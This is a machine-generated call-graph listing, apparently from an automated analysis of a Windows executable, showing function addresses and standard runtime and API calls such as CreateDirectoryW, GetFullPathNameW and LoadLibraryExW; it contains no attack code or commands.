7ff70aef8230 17281->17283 17286 7ff70aef8243 17281->17286 17284 7ff70aefc5c0 _log10_special 8 API calls 17282->17284 17285 7ff70aef2810 49 API calls 17283->17285 17287 7ff70aef839f 17284->17287 17285->17282 17288 7ff70aef8251 GetDriveTypeW 17286->17288 17289 7ff70aef82af 17286->17289 17287->16327 17306 7ff70af082a8 17287->17306 17293 7ff70aef8285 17288->17293 17294 7ff70aef82a0 17288->17294 17454 7ff70af07e78 17289->17454 17292 7ff70aef82c1 17295 7ff70aef82c9 17292->17295 17299 7ff70aef82dc 17292->17299 17296 7ff70aef2810 49 API calls 17293->17296 17447 7ff70af079dc 17294->17447 17298 7ff70aef2810 49 API calls 17295->17298 17296->17282 17298->17282 17300 7ff70aef833e CreateDirectoryW 17299->17300 17301 7ff70aef26b0 48 API calls 17299->17301 17300->17282 17302 7ff70aef834d GetLastError 17300->17302 17303 7ff70aef8318 CreateDirectoryW 17301->17303 17302->17282 17303->17299 17307 7ff70af082c8 17306->17307 17308 7ff70af082b5 17306->17308 17555 7ff70af07f2c 17307->17555 17310 7ff70af04f78 _get_daylight 11 API calls 17308->17310 17312 7ff70af082ba 17310->17312 17314 7ff70af0a950 _invalid_parameter_noinfo 37 API calls 17312->17314 17313 7ff70af082c6 17313->16325 17314->17313 17357 7ff70af115c8 17316->17357 17416 7ff70af11340 17357->17416 17437 7ff70af10348 EnterCriticalSection 17416->17437 17448 7ff70af079fa 17447->17448 17451 7ff70af07a2d 17447->17451 17448->17451 17466 7ff70af104e4 17448->17466 17451->17282 17452 7ff70af0a970 _isindst 17 API calls 17453 7ff70af07a5d 17452->17453 17455 7ff70af07e94 17454->17455 17456 7ff70af07f02 17454->17456 17455->17456 17458 7ff70af07e99 17455->17458 17500 7ff70af10830 17456->17500 17459 7ff70af07eb1 17458->17459 17460 7ff70af07ece 17458->17460 17475 7ff70af07c48 GetFullPathNameW 17459->17475 17483 7ff70af07cbc GetFullPathNameW 17460->17483 17465 7ff70af07ec6 __std_exception_destroy 17465->17292 17467 7ff70af104fb 17466->17467 17468 7ff70af104f1 17466->17468 17469 7ff70af04f78 _get_daylight 11 API calls 17467->17469 17468->17467 17473 7ff70af10517 17468->17473 17470 7ff70af10503 17469->17470 17471 7ff70af0a950 _invalid_parameter_noinfo 37 API calls 17470->17471 17472 7ff70af07a29 17471->17472 17472->17451 17472->17452 17473->17472 17474 7ff70af04f78 _get_daylight 11 API calls 17473->17474 17474->17470 17476 7ff70af07c6e GetLastError 17475->17476 17478 7ff70af07c84 17475->17478 17477 7ff70af04eec _fread_nolock 11 API calls 17476->17477 17480 7ff70af07c7b 17477->17480 17479 7ff70af07c80 17478->17479 17482 7ff70af04f78 _get_daylight 11 API calls 17478->17482 17479->17465 17481 7ff70af04f78 _get_daylight 11 API calls 17480->17481 17481->17479 17482->17479 17484 7ff70af07cef GetLastError 17483->17484 17489 7ff70af07d05 __std_exception_destroy 17483->17489 17485 7ff70af04eec _fread_nolock 11 API calls 17484->17485 17486 7ff70af07cfc 17485->17486 17487 7ff70af04f78 _get_daylight 11 API calls 17486->17487 17488 7ff70af07d01 17487->17488 17491 7ff70af07d94 17488->17491 17489->17488 17490 7ff70af07d5f GetFullPathNameW 17489->17490 17490->17484 17490->17488 17492 7ff70af07dbd memcpy_s 17491->17492 17493 7ff70af07e08 memcpy_s 17491->17493 17492->17493 17494 7ff70af07df1 17492->17494 17497 7ff70af07e2a 17492->17497 17493->17465 17495 7ff70af04f78 _get_daylight 11 API calls 17494->17495 17496 7ff70af07df6 17495->17496 17497->17493 17499 7ff70af04f78 _get_daylight 11 API calls 17497->17499 17499->17496 17503 7ff70af10640 17500->17503 17504 7ff70af1066b 17503->17504 17505 7ff70af10682 17503->17505 17506 7ff70af04f78 _get_daylight 11 API calls 17504->17506 17507 7ff70af106a7 17505->17507 17508 7ff70af10686 17505->17508 17510 7ff70af10670 17506->17510 17541 7ff70af0f628 17507->17541 17529 7ff70af107ac 17508->17529 17514 7ff70af0a950 _invalid_parameter_noinfo 37 API calls 17510->17514 17512 7ff70af106ac 17518 7ff70af1067b __std_exception_destroy 17514->17518 17515 7ff70af1068f 17521 7ff70aefc5c0 _log10_special 8 API calls 17518->17521 17524 7ff70af107a1 17521->17524 17524->17465 17530 7ff70af107f6 17529->17530 17531 7ff70af107c6 17529->17531 17533 7ff70af10801 GetDriveTypeW 17530->17533 17535 7ff70af107e1 17530->17535 17532 7ff70af04f58 _fread_nolock 11 API calls 17531->17532 17534 7ff70af107cb 17532->17534 17533->17535 17536 7ff70af04f78 _get_daylight 11 API calls 17534->17536 17537 7ff70aefc5c0 _log10_special 8 API calls 17535->17537 17538 7ff70af107d6 17536->17538 17539 7ff70af1068b 17537->17539 17540 7ff70af0a950 _invalid_parameter_noinfo 37 API calls 17538->17540 17539->17512 17539->17515 17540->17535 17542 7ff70af1a540 memcpy_s 17541->17542 17543 7ff70af0f65e GetCurrentDirectoryW 17542->17543 17544 7ff70af0f69c 17543->17544 17545 7ff70af0f675 17543->17545 17546 7ff70af0ec08 _get_daylight 11 API calls 17544->17546 17547 7ff70aefc5c0 _log10_special 8 API calls 17545->17547 17548 7ff70af0f6ab 17546->17548 17549 7ff70af0f709 17547->17549 17549->17512 17562 7ff70af10348 EnterCriticalSection 17555->17562 17564 7ff70aef455a 17563->17564 17565 7ff70aef9400 2 API calls 17564->17565 17566 7ff70aef457f 17565->17566 17567 7ff70aefc5c0 _log10_special 8 API calls 17566->17567 17568 7ff70aef45a7 17567->17568 17568->16365 17571 7ff70aef7e1e 17569->17571 17570 7ff70aef7f42 17573 7ff70aefc5c0 _log10_special 8 API calls 17570->17573 17571->17570 17572 7ff70aef1c80 49 API calls 17571->17572 17576 7ff70aef7ea5 17572->17576 17574 7ff70aef7f73 17573->17574 17574->16365 17575 7ff70aef1c80 49 API calls 17575->17576 17576->17570 17576->17575 17577 7ff70aef4550 10 API calls 17576->17577 17578 7ff70aef7efb 17576->17578 17577->17576 17579 7ff70aef9400 2 API calls 17578->17579 17580 7ff70aef7f13 CreateDirectoryW 17579->17580 17580->17570 17580->17576 17582 7ff70aef1613 17581->17582 17583 7ff70aef1637 17581->17583 17702 7ff70aef1050 17582->17702 17585 7ff70aef45b0 108 API calls 17583->17585 17587 7ff70aef164b 17585->17587 17586 7ff70aef1618 17588 7ff70aef162e 17586->17588 17592 7ff70aef2710 54 API calls 17586->17592 17589 7ff70aef1653 17587->17589 17590 7ff70aef1682 17587->17590 17588->16365 17593 7ff70af04f78 _get_daylight 11 API calls 17589->17593 17591 7ff70aef45b0 108 API calls 17590->17591 17594 7ff70aef1696 17591->17594 17592->17588 17595 7ff70aef1658 17593->17595 17596 7ff70aef169e 17594->17596 17597 7ff70aef16b8 17594->17597 17598 7ff70aef2910 54 API calls 17595->17598 17599 7ff70aef2710 54 API calls 17596->17599 17600 7ff70af00744 73 API calls 17597->17600 17601 7ff70aef1671 17598->17601 17602 7ff70aef16ae 17599->17602 17603 7ff70aef16cd 17600->17603 17601->16365 17606 7ff70af000bc 74 API calls 17602->17606 17604 7ff70aef16d1 17603->17604 17605 7ff70aef16f9 17603->17605 17607 7ff70af04f78 _get_daylight 11 API calls 17604->17607 17608 7ff70aef16ff 17605->17608 17609 7ff70aef1717 17605->17609 17610 7ff70aef1829 17606->17610 17611 7ff70aef16d6 17607->17611 17680 7ff70aef1210 17608->17680 17614 7ff70aef1739 17609->17614 17624 7ff70aef1761 17609->17624 17610->16365 17613 7ff70aef2910 54 API calls 17611->17613 17620 7ff70aef16ef __std_exception_destroy 17613->17620 17616 7ff70af04f78 _get_daylight 11 API calls 17614->17616 17615 7ff70af000bc 74 API calls 17615->17602 17617 7ff70aef173e 17616->17617 17618 7ff70aef2910 54 API calls 17617->17618 17618->17620 17619 7ff70af0040c _fread_nolock 53 API calls 17619->17624 17620->17615 17621 7ff70aef17da 17622 7ff70af04f78 _get_daylight 11 API calls 17621->17622 17625 7ff70aef17ca 17622->17625 17624->17619 17624->17620 17624->17621 17626 7ff70aef17c5 17624->17626 17733 7ff70af00b4c 17624->17733 17628 7ff70aef2910 54 API calls 17625->17628 17627 7ff70af04f78 _get_daylight 11 API calls 17626->17627 17627->17625 17628->17620 17630 7ff70aef717b 17629->17630 17632 7ff70aef7134 17629->17632 17630->16365 17632->17630 17766 7ff70af05094 17632->17766 17634 7ff70aef4191 17633->17634 17635 7ff70aef44d0 49 API calls 17634->17635 17636 7ff70aef41cb 17635->17636 17637 7ff70aef44d0 49 API calls 17636->17637 17638 7ff70aef41db 17637->17638 17639 7ff70aef41fd 17638->17639 17640 7ff70aef422c 17638->17640 17797 7ff70aef4100 17639->17797 17642 7ff70aef4100 51 API calls 17640->17642 17643 7ff70aef422a 17642->17643 17644 7ff70aef428c 17643->17644 17645 7ff70aef4257 17643->17645 17646 7ff70aef4100 51 API calls 17644->17646 17804 7ff70aef7ce0 17645->17804 17648 7ff70aef42b0 17646->17648 17651 7ff70aef4100 51 API calls 17648->17651 17663 7ff70aef4302 17648->17663 17650 7ff70aef2710 54 API calls 17655 7ff70aef4287 17650->17655 17657 7ff70aef42d9 17651->17657 17652 7ff70aef4383 17654 7ff70aef1950 115 API calls 17652->17654 17653 7ff70aefc5c0 _log10_special 8 API calls 17656 7ff70aef4425 17653->17656 17658 7ff70aef438d 17654->17658 17655->17653 17656->16365 17659 7ff70aef4100 51 API calls 17657->17659 17657->17663 17660 7ff70aef4395 17658->17660 17661 7ff70aef43ee 17658->17661 17659->17663 17830 7ff70aef1840 17660->17830 17664 7ff70aef2710 54 API calls 17661->17664 17662 7ff70aef437c 17662->17660 17665 7ff70aef4307 17662->17665 17663->17652 17663->17662 17663->17665 17667 7ff70aef436b 17663->17667 17664->17665 17672 7ff70aef2710 54 API calls 17665->17672 17671 7ff70aef2710 54 API calls 17667->17671 17669 7ff70aef43c2 17674 7ff70aef1600 118 API calls 17669->17674 17670 7ff70aef43ac 17673 7ff70aef2710 54 API calls 17670->17673 17671->17665 17672->17655 17673->17655 17675 7ff70aef43d0 17674->17675 17675->17655 17676 7ff70aef2710 54 API calls 17675->17676 17676->17655 17678 7ff70aef1c80 49 API calls 17677->17678 17679 7ff70aef4464 17678->17679 17679->16365 17681 7ff70aef1268 17680->17681 17682 7ff70aef126f 17681->17682 17683 7ff70aef1297 17681->17683 17684 7ff70aef2710 54 API calls 17682->17684 17686 7ff70aef12d4 17683->17686 17687 7ff70aef12b1 17683->17687 17685 7ff70aef1282 17684->17685 17685->17620 17690 7ff70aef12e6 17686->17690 17700 7ff70aef1309 memcpy_s 17686->17700 17688 7ff70af04f78 _get_daylight 11 API calls 17687->17688 17689 7ff70aef12b6 17688->17689 17691 7ff70aef2910 54 API calls 17689->17691 17692 7ff70af04f78 _get_daylight 11 API calls 17690->17692 17696 7ff70aef12cf __std_exception_destroy 17691->17696 17693 7ff70aef12eb 17692->17693 17695 7ff70aef2910 54 API calls 17693->17695 17694 7ff70af0040c _fread_nolock 53 API calls 17694->17700 17695->17696 17696->17620 17697 7ff70aef13cf 17698 7ff70aef2710 54 API calls 17697->17698 17698->17696 17699 7ff70af00b4c 76 API calls 17699->17700 17700->17694 17700->17696 17700->17697 17700->17699 17701 7ff70af00180 37 API calls 17700->17701 17701->17700 17703 7ff70aef45b0 108 API calls 17702->17703 17704 7ff70aef108c 17703->17704 17705 7ff70aef1094 17704->17705 17706 7ff70aef10a9 17704->17706 17707 7ff70aef2710 54 API calls 17705->17707 17708 7ff70af00744 73 API calls 17706->17708 17713 7ff70aef10a4 __std_exception_destroy 17707->17713 17709 7ff70aef10bf 17708->17709 17710 7ff70aef10e6 17709->17710 17711 7ff70aef10c3 17709->17711 17715 7ff70aef1122 17710->17715 17716 7ff70aef10f7 17710->17716 17712 7ff70af04f78 _get_daylight 11 API calls 17711->17712 17714 7ff70aef10c8 17712->17714 17713->17586 17717 7ff70aef2910 54 API calls 17714->17717 17719 7ff70aef1129 17715->17719 17727 7ff70aef113c 17715->17727 17718 7ff70af04f78 _get_daylight 11 API calls 17716->17718 17724 7ff70aef10e1 __std_exception_destroy 17717->17724 17720 7ff70aef1100 17718->17720 17721 7ff70aef1210 92 API calls 17719->17721 17722 7ff70aef2910 54 API calls 17720->17722 17721->17724 17722->17724 17723 7ff70af000bc 74 API calls 17725 7ff70aef11b4 17723->17725 17724->17723 17725->17713 17737 7ff70aef46e0 17725->17737 17726 7ff70af0040c _fread_nolock 53 API calls 17726->17727 17727->17724 17727->17726 17728 7ff70aef11ed 17727->17728 17730 7ff70af04f78 _get_daylight 11 API calls 17728->17730 17731 7ff70aef11f2 17730->17731 17732 7ff70aef2910 54 API calls 17731->17732 17732->17724 17734 7ff70af00b7c 17733->17734 17751 7ff70af0089c 17734->17751 17736 7ff70af00b9a 17736->17624 17738 7ff70aef46f0 17737->17738 17739 7ff70aef9400 2 API calls 17738->17739 17740 7ff70aef471b 17739->17740 17741 7ff70aef9400 2 API calls 17740->17741 17750 7ff70aef478e 17740->17750 17742 7ff70aef4736 17741->17742 17744 7ff70aef473b CreateSymbolicLinkW 17742->17744 17742->17750 17743 7ff70aefc5c0 _log10_special 8 API calls 17745 7ff70aef47a9 17743->17745 17746 7ff70aef4765 17744->17746 17744->17750 17745->17713 17747 7ff70aef476e GetLastError 17746->17747 17746->17750 17747->17750 17750->17743 17752 7ff70af008bc 17751->17752 17753 7ff70af008e9 17751->17753 17752->17753 17754 7ff70af008c6 17752->17754 17755 7ff70af008f1 17752->17755 17753->17736 17756 7ff70af0a884 _invalid_parameter_noinfo 37 API calls 17754->17756 17758 7ff70af007dc 17755->17758 17756->17753 17765 7ff70af054dc EnterCriticalSection 17758->17765 17767 7ff70af050a1 17766->17767 17768 7ff70af050ce 17766->17768 17769 7ff70af04f78 _get_daylight 11 API calls 17767->17769 17778 7ff70af05058 17767->17778 17770 7ff70af050f1 17768->17770 17773 7ff70af0510d 17768->17773 17771 7ff70af050ab 17769->17771 17772 7ff70af04f78 _get_daylight 11 API calls 17770->17772 17774 7ff70af0a950 _invalid_parameter_noinfo 37 API calls 17771->17774 17775 7ff70af050f6 17772->17775 17781 7ff70af04fbc 17773->17781 17777 7ff70af050b6 17774->17777 17779 7ff70af0a950 _invalid_parameter_noinfo 37 API calls 17775->17779 17777->17632 17778->17632 17780 7ff70af05101 17779->17780 17780->17632 17782 7ff70af04fe0 17781->17782 17783 7ff70af04fdb 17781->17783 17782->17783 17784 7ff70af0b1c0 __CxxCallCatchBlock 45 API calls 17782->17784 17783->17780 17785 7ff70af04ffb 17784->17785 17789 7ff70af0d9f4 17785->17789 17790 7ff70af0da09 17789->17790 17792 7ff70af0501e 17789->17792 17791 7ff70af13374 45 API calls 17790->17791 17790->17792 17791->17792 17793 7ff70af0da60 17792->17793 17794 7ff70af0da88 17793->17794 17795 7ff70af0da75 17793->17795 17794->17783 17795->17794 17796 7ff70af126c0 45 API calls 17795->17796 17796->17794 17798 7ff70aef4126 17797->17798 17799 7ff70af049f4 49 API calls 17798->17799 17801 7ff70aef414c 17799->17801 17800 7ff70aef415d 17800->17643 17801->17800 17802 7ff70aef4550 10 API calls 17801->17802 17803 7ff70aef416f 17802->17803 17803->17643 17805 7ff70aef7cf5 17804->17805 17806 7ff70aef45b0 108 API calls 17805->17806 17807 7ff70aef7d1b 17806->17807 17808 7ff70aef7d42 17807->17808 17809 7ff70aef45b0 108 API calls 17807->17809 17811 7ff70aefc5c0 _log10_special 8 API calls 17808->17811 17810 7ff70aef7d32 17809->17810 17812 7ff70aef7d3d 17810->17812 17813 7ff70aef7d4c 17810->17813 17814 7ff70aef4267 17811->17814 17815 7ff70af000bc 74 API calls 17812->17815 17834 7ff70af00154 17813->17834 17814->17650 17814->17655 17815->17808 17817 7ff70aef7daf 17818 7ff70af000bc 74 API calls 17817->17818 17820 7ff70aef7dd7 17818->17820 17819 7ff70af0040c _fread_nolock 53 API calls 17828 7ff70aef7d51 17819->17828 17822 7ff70aef7db6 17823 7ff70af00180 37 API calls 17822->17823 17825 7ff70aef7db1 17823->17825 17824 7ff70af00b4c 76 API calls 17824->17828 17825->17817 17840 7ff70af07388 17825->17840 17826 7ff70af00180 37 API calls 17826->17828 17828->17817 17828->17819 17828->17822 17828->17824 17828->17825 17828->17826 17829 7ff70af00154 37 API calls 17828->17829 17829->17828 17832 7ff70aef18d5 17830->17832 17833 7ff70aef1865 17830->17833 17831 7ff70af05094 45 API calls 17831->17833 17832->17669 17832->17670 17833->17831 17833->17832 17835 7ff70af0016d 17834->17835 17836 7ff70af0015d 17834->17836 17835->17828 17837 7ff70af04f78 _get_daylight 11 API calls 17836->17837 17838 7ff70af00162 17837->17838 17839 7ff70af0a950 _invalid_parameter_noinfo 37 API calls 17838->17839 17839->17835 17841 7ff70af07390 17840->17841 17862 7ff70af05f38 17860->17862 17861 7ff70af05f5e 17863 7ff70af04f78 _get_daylight 11 API calls 17861->17863 17862->17861 17864 7ff70af05f91 17862->17864 17865 7ff70af05f63 17863->17865 17866 7ff70af05fa4 17864->17866 17867 7ff70af05f97 17864->17867 17868 7ff70af0a950 _invalid_parameter_noinfo 37 API calls 17865->17868 17879 7ff70af0ac98 17866->17879 17869 7ff70af04f78 _get_daylight 11 API calls 17867->17869 17871 7ff70aef4606 17868->17871 17869->17871 17871->16386 17892 7ff70af10348 EnterCriticalSection 17879->17892 18253 7ff70af07968 18252->18253 18256 7ff70af07444 18253->18256 18255 7ff70af07981 18255->16396 18257 7ff70af0745f 18256->18257 18258 7ff70af0748e 18256->18258 18259 7ff70af0a884 _invalid_parameter_noinfo 37 API calls 18257->18259 18266 7ff70af054dc EnterCriticalSection 18258->18266 18261 7ff70af0747f 18259->18261 18261->18255 18268 7ff70aeffeb3 18267->18268 18270 7ff70aeffee1 18267->18270 18269 7ff70af0a884 _invalid_parameter_noinfo 37 API calls 18268->18269 18271 7ff70aeffed3 18269->18271 18270->18271 18277 7ff70af054dc EnterCriticalSection 18270->18277 18271->16400 18279 7ff70aefcb62 RtlLookupFunctionEntry 18278->18279 18280 7ff70aefc97b 18279->18280 18281 7ff70aefcb78 RtlVirtualUnwind 18279->18281 18282 7ff70aefc910 SetUnhandledExceptionFilter UnhandledExceptionFilter GetCurrentProcess TerminateProcess 18280->18282 18281->18279 18281->18280 18284 7ff70aef45b0 108 API calls 18283->18284 18285 7ff70aef1493 18284->18285 18286 7ff70aef149b 18285->18286 18287 7ff70aef14bc 18285->18287 18289 7ff70aef2710 54 API calls 18286->18289 18288 7ff70af00744 73 API calls 18287->18288 18291 7ff70aef14d1 18288->18291 18290 7ff70aef14ab 18289->18290 18290->16442 18292 7ff70aef14d5 18291->18292 18293 7ff70aef14f8 18291->18293 18294 7ff70af04f78 _get_daylight 11 API calls 18292->18294 18297 7ff70aef1532 18293->18297 18298 7ff70aef1508 18293->18298 18295 7ff70aef14da 18294->18295 18296 7ff70aef2910 54 API calls 18295->18296 18312 7ff70aef14f3 __std_exception_destroy 18296->18312 18299 7ff70aef154b 18297->18299 18300 7ff70aef1538 18297->18300 18301 7ff70af04f78 _get_daylight 11 API calls 18298->18301 18307 7ff70af0040c _fread_nolock 53 API calls 18299->18307 18308 7ff70aef15d6 18299->18308 18299->18312 18302 7ff70aef1210 92 API calls 18300->18302 18303 7ff70aef1510 18301->18303 18302->18312 18305 7ff70aef2910 54 API calls 18303->18305 18304 7ff70af000bc 74 API calls 18306 7ff70aef15c4 18304->18306 18305->18312 18306->16442 18307->18299 18309 7ff70af04f78 _get_daylight 11 API calls 18308->18309 18310 7ff70aef15db 18309->18310 18311 7ff70aef2910 54 API calls 18310->18311 18311->18312 18312->18304 18314 7ff70aef9400 2 API calls 18313->18314 18315 7ff70aef9084 LoadLibraryExW 18314->18315 18316 7ff70aef90a3 __std_exception_destroy 18315->18316 18316->16476 18390 7ff70aef6365 18389->18390 18391 7ff70aef1c80 49 API calls 18390->18391 18392 7ff70aef63a1 18391->18392 18393 7ff70aef63cd 18392->18393 18394 7ff70aef63aa 18392->18394 18396 7ff70aef4620 49 API calls 18393->18396 18395 7ff70aef2710 54 API calls 18394->18395 18397 7ff70aef63c3 18395->18397 18398 7ff70aef63e5 18396->18398 18402 7ff70aefc5c0 _log10_special 8 API calls 18397->18402 18399 7ff70aef6403 18398->18399 18400 7ff70aef2710 54 API calls 18398->18400 18401 7ff70aef4550 10 API calls 18399->18401 18400->18399 18404 7ff70aef640d 18401->18404 18403 7ff70aef336e 18402->18403 18403->16516 18420 7ff70aef64f0 18403->18420 18405 7ff70aef641b 18404->18405 18406 7ff70aef9070 3 API calls 18404->18406 18407 7ff70aef4620 49 API calls 18405->18407 18406->18405 18408 7ff70aef6434 18407->18408 18409 7ff70aef6459 18408->18409 18410 7ff70aef6439 18408->18410 18412 7ff70aef9070 3 API calls 18409->18412 18411 7ff70aef2710 54 API calls 18410->18411 18411->18397 18413 7ff70aef6466 18412->18413 18414 7ff70aef64b1 18413->18414 18415 7ff70aef6472 18413->18415 18479 7ff70aef5820 GetProcAddress 18414->18479 18416 7ff70aef9400 2 API calls 18415->18416 18418 7ff70aef648a GetLastError 18416->18418 18419 7ff70aef2c50 51 API calls 18418->18419 18419->18397 18569 7ff70aef53f0 18420->18569 18422 7ff70aef6516 18423 7ff70aef652f 18422->18423 18424 7ff70aef651e 18422->18424 18576 7ff70aef4c80 18423->18576 18425 7ff70aef2710 54 API calls 18424->18425 18431 7ff70aef652a 18425->18431 18428 7ff70aef653b 18430 7ff70aef2710 54 API calls 18428->18430 18429 7ff70aef654c 18432 7ff70aef655c 18429->18432 18434 7ff70aef656d 18429->18434 18430->18431 18431->16512 18433 7ff70aef2710 54 API calls 18432->18433 18433->18431 18435 7ff70aef659d 18434->18435 18436 7ff70aef658c 18434->18436 18438 7ff70aef65bd 18435->18438 18439 7ff70aef65ac 18435->18439 18437 7ff70aef2710 54 API calls 18436->18437 18437->18431 18580 7ff70aef4d40 18438->18580 18441 7ff70aef2710 54 API calls 18439->18441 18441->18431 18458 7ff70aef6060 18457->18458 18459 7ff70aef6089 18458->18459 18465 7ff70aef60a0 __std_exception_destroy 18458->18465 18460 7ff70aef2710 54 API calls 18459->18460 18461 7ff70aef6095 18460->18461 18461->16514 18462 7ff70aef61ab 18462->16514 18463 7ff70aef1470 116 API calls 18463->18465 18464 7ff70aef2710 54 API calls 18464->18465 18465->18462 18465->18463 18465->18464 18480 7ff70aef5842 GetLastError 18479->18480 18481 7ff70aef586f GetProcAddress 18479->18481 18482 7ff70aef584f 18480->18482 18483 7ff70aef588b GetLastError 18481->18483 18484 7ff70aef589a GetProcAddress 18481->18484 18485 7ff70aef2c50 51 API calls 18482->18485 18483->18482 18486 7ff70aef58c5 GetProcAddress 18484->18486 18487 7ff70aef58b6 GetLastError 18484->18487 18488 7ff70aef5864 18485->18488 18489 7ff70aef58f3 GetProcAddress 18486->18489 18490 7ff70aef58e1 GetLastError 18486->18490 18487->18482 18488->18397 18491 7ff70aef5921 GetProcAddress 18489->18491 18492 7ff70aef590f GetLastError 18489->18492 18490->18482 18492->18482 18571 7ff70aef541c 18569->18571 18570 7ff70aef5424 18570->18422 18571->18570 18574 7ff70aef55c4 18571->18574 18600 7ff70af06b14 18571->18600 18572 7ff70aef5787 __std_exception_destroy 18572->18422 18573 7ff70aef47c0 47 API calls 18573->18574 18574->18572 18574->18573 18577 7ff70aef4cb0 18576->18577 18578 7ff70aefc5c0 _log10_special 8 API calls 18577->18578 18579 7ff70aef4d1a 18578->18579 18579->18428 18579->18429 18601 7ff70af06b44 18600->18601 18604 7ff70af06010 18601->18604 18603 7ff70af06b74 18603->18571 18605 7ff70af06053 18604->18605 18606 7ff70af06041 18604->18606 18607 7ff70af0609d 18605->18607 18609 7ff70af06060 18605->18609 18608 7ff70af04f78 _get_daylight 11 API calls 18606->18608 18612 7ff70af04830 45 API calls 18607->18612 18615 7ff70af060b8 18607->18615 18610 7ff70af06046 18608->18610 18611 7ff70af0a884 _invalid_parameter_noinfo 37 API calls 18609->18611 18614 7ff70af0a950 _invalid_parameter_noinfo 37 API calls 18610->18614 18624 7ff70af06051 18611->18624 18612->18615 18614->18624 18617 7ff70af060da 18615->18617 18625 7ff70af06a9c 18615->18625 18616 7ff70af0617b 18618 7ff70af04f78 _get_daylight 11 API calls 18616->18618 18616->18624 18617->18616 18619 7ff70af04f78 _get_daylight 11 API calls 18617->18619 18620 7ff70af06226 18618->18620 18621 7ff70af06170 18619->18621 18622 7ff70af0a950 _invalid_parameter_noinfo 37 API calls 18620->18622 18623 7ff70af0a950 _invalid_parameter_noinfo 37 API calls 18621->18623 18622->18624 18623->18616 18624->18603 18626 7ff70af06abf 18625->18626 18628 7ff70af06ad6 18625->18628 18631 7ff70af0ffd8 18626->18631 18629 7ff70af06ac4 18628->18629 18636 7ff70af10008 18628->18636 18629->18615 18632 7ff70af0b1c0 __CxxCallCatchBlock 45 API calls 18631->18632 18633 7ff70af0ffe1 18632->18633 18637 7ff70af04fbc 45 API calls 18636->18637 18638 7ff70af10041 18637->18638 18677->16519 18679 7ff70af0b1c0 __CxxCallCatchBlock 45 API calls 18678->18679 18680 7ff70af0a451 18679->18680 18683 7ff70af0a574 18680->18683 18692 7ff70af136c0 18683->18692 18718 7ff70af13678 18692->18718 18723 7ff70af10348 EnterCriticalSection 18718->18723 19150 7ff70af17c90 19153 7ff70af12660 19150->19153 19154 7ff70af126b2 19153->19154 19155 7ff70af1266d 19153->19155 19159 7ff70af0b294 19155->19159 19160 7ff70af0b2c0 FlsSetValue 19159->19160 19161 7ff70af0b2a5 FlsGetValue 19159->19161 19163 7ff70af0b2cd 19160->19163 19164 7ff70af0b2b2 19160->19164 19162 7ff70af0b2ba 19161->19162 19161->19164 19162->19160 19167 7ff70af0ec08 _get_daylight 11 API calls 19163->19167 19165 7ff70af0b2b8 19164->19165 19166 7ff70af0a574 __CxxCallCatchBlock 45 API calls 19164->19166 19179 7ff70af12334 19165->19179 19168 7ff70af0b335 19166->19168 19169 7ff70af0b2dc 19167->19169 19170 7ff70af0b2fa FlsSetValue 19169->19170 19171 7ff70af0b2ea FlsSetValue 19169->19171 19173 7ff70af0b318 19170->19173 19174 7ff70af0b306 FlsSetValue 19170->19174 19172 7ff70af0b2f3 19171->19172 19175 7ff70af0a9b8 __free_lconv_mon 11 API calls 19172->19175 19176 7ff70af0af64 _get_daylight 11 API calls 19173->19176 19174->19172 19175->19164 19177 7ff70af0b320 19176->19177 19178 7ff70af0a9b8 __free_lconv_mon 11 API calls 19177->19178 19178->19165 19202 7ff70af125a4 19179->19202 19181 7ff70af12369 19217 7ff70af12034 19181->19217 19184 7ff70af12386 19184->19154 19185 7ff70af0d66c _fread_nolock 12 API calls 19186 7ff70af12397 19185->19186 19187 7ff70af1239f 19186->19187 19189 7ff70af123ae 19186->19189 19188 7ff70af0a9b8 __free_lconv_mon 11 API calls 19187->19188 19188->19184 19189->19189 19224 7ff70af126dc 19189->19224 19192 7ff70af124aa 19193 7ff70af04f78 _get_daylight 11 API calls 19192->19193 19194 7ff70af124af 19193->19194 19197 7ff70af0a9b8 __free_lconv_mon 11 API calls 19194->19197 19195 7ff70af12505 19196 7ff70af1256c 19195->19196 19235 7ff70af11e64 19195->19235 19200 7ff70af0a9b8 __free_lconv_mon 11 API calls 19196->19200 19197->19184 19198 7ff70af124c4 19198->19195 19201 7ff70af0a9b8 __free_lconv_mon 11 API calls 19198->19201 19200->19184 19201->19195 19203 7ff70af125c7 19202->19203 19204 7ff70af125d1 19203->19204 19250 7ff70af10348 EnterCriticalSection 19203->19250 19207 7ff70af12643 19204->19207 19210 7ff70af0a574 __CxxCallCatchBlock 45 API calls 19204->19210 19207->19181 19211 7ff70af1265b 19210->19211 19213 7ff70af126b2 19211->19213 19214 7ff70af0b294 50 API calls 19211->19214 19213->19181 19215 7ff70af1269c 19214->19215 19216 7ff70af12334 65 API calls 19215->19216 19216->19213 19218 7ff70af04fbc 45 API calls 19217->19218 19219 7ff70af12048 19218->19219 19220 7ff70af12054 GetOEMCP 19219->19220 19221 7ff70af12066 19219->19221 19223 7ff70af1207b 19220->19223 19222 7ff70af1206b GetACP 19221->19222 19221->19223 19222->19223 19223->19184 19223->19185 19225 7ff70af12034 47 API calls 19224->19225 19226 7ff70af12709 19225->19226 19227 7ff70af1285f 19226->19227 19229 7ff70af12746 IsValidCodePage 19226->19229 19234 7ff70af12760 memcpy_s 19226->19234 19228 7ff70aefc5c0 _log10_special 8 API calls 19227->19228 19230 7ff70af124a1 19228->19230 19229->19227 19231 7ff70af12757 19229->19231 19230->19192 19230->19198 19232 7ff70af12786 GetCPInfo 19231->19232 19231->19234 19232->19227 19232->19234 19251 7ff70af1214c 19234->19251 19307 7ff70af10348 EnterCriticalSection 19235->19307 19252 7ff70af12189 GetCPInfo 19251->19252 19261 7ff70af1227f 19251->19261 19257 7ff70af1219c 19252->19257 19252->19261 19253 7ff70aefc5c0 _log10_special 8 API calls 19254 7ff70af1231e 19253->19254 19254->19227 19255 7ff70af12eb0 48 API calls 19256 7ff70af12213 19255->19256 19262 7ff70af17bf4 19256->19262 19257->19255 19260 7ff70af17bf4 54 API calls 19260->19261 19261->19253 19263 7ff70af04fbc 45 API calls 19262->19263 19264 7ff70af17c19 19263->19264 19267 7ff70af178c0 19264->19267 19268 7ff70af17901 19267->19268 19269 7ff70af0f910 _fread_nolock MultiByteToWideChar 19268->19269 19272 7ff70af1794b 19269->19272 19270 7ff70af17bc9 19271 7ff70aefc5c0 _log10_special 8 API calls 19270->19271 19273 7ff70af12246 19271->19273 19272->19270 19274 7ff70af0d66c _fread_nolock 12 API calls 19272->19274 19276 7ff70af17983 19272->19276 19286 7ff70af17a81 19272->19286 19273->19260 19274->19276 19275 7ff70af0a9b8 